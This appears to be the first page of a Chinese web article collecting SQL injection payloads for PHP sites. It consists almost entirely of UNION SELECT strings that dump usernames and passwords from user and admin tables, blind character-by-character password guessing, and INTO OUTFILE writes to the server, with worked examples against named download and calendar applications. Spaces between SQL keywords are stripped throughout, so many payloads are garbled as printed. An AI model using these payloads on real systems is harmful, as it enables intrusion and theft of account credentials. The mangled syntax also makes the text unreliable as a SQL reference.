高级php注入方法集锦第1/2页

时间:2021-05-28

'%23

'andpassWord='mypass

id=-1unionselect1,1,1

id=-1unionselectchar(97),char(97),char(97)

id=1unionselect1,1,1frommembers

id=1unionselect1,1,1fromadmin

id=1unionselect1,1,1fromuser

userid=1andpassword=mypass

userid=1andmid(password,3,1)=char(112)

userid=1andmid(password,4,1)=char(97)

andord(mid(password,3,1))>111(ord函数很好用,可以返回整形的)

'andLENGTH(password)='6(探测密码长度)

'andLEFT(password,1)='m

'andLEFT(password,2)='my

…………………………依次类推

'unionselect1,username,passwordfromuser/*

'unionselect1,username,passwordfromuser/*

='unionselect1,username,passwordfromuser/*(可以是1或者=后直接跟)

99999'unionselect1,username,passwordfromuser/*

'intooutfile'c:/file.txt(导出文件)

='or1=1intooutfile'c:/file.txt

1'unionselect1,username,passwordfromuserintooutfile'c:/user.txt

selectpasswordFROMadminswherelogin='John'INTODUMPFILE'/path/to/site/file.txt'

id='unionselect1,username,passwordfromuserintooutfile

id=-1unionselect1,database(),version()(灵活应用查询)

常用查询测试语句,

select*FROMtablewhere1=1

select*FROMtablewhere'uuu'='uuu'

select*FROMtablewhere1<>2

select*FROMtablewhere3>2

select*FROMtablewhere2<3

select*FROMtablewhere1

select*FROMtablewhere1+1

select*FROMtablewhere1--1

select*FROMtablewhereISNULL(NULL)

select*FROMtablewhereISNULL(COT(0))

select*FROMtablewhere1ISNOTNULL

select*FROMtablewhereNULLISNULL

select*FROMtablewhere2BETWEEN1AND3

select*FROMtablewhere'b'BETWEEN'a'AND'c'

select*FROMtablewhere2IN(0,1,2)

select*FROMtablewhereCASEWHEN1>0THEN1END

例如:夜猫下载系统1.0版本

id=1unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_user

unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1

id=10000unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andgroupid=1

unionselect1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1(替换,寻找密码)

unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andord(mid(password,1,1))=49(验证第一位密码)

unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andord(mid(password,2,1))=50(第二位)

unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andord(mid(password,3,1))=51

…………………………………………………………

例如2:灰色轨迹变换id进行测试(meteor)

union%20(select%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate

union%20(select%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate
12下一页阅读全文

声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。

相关文章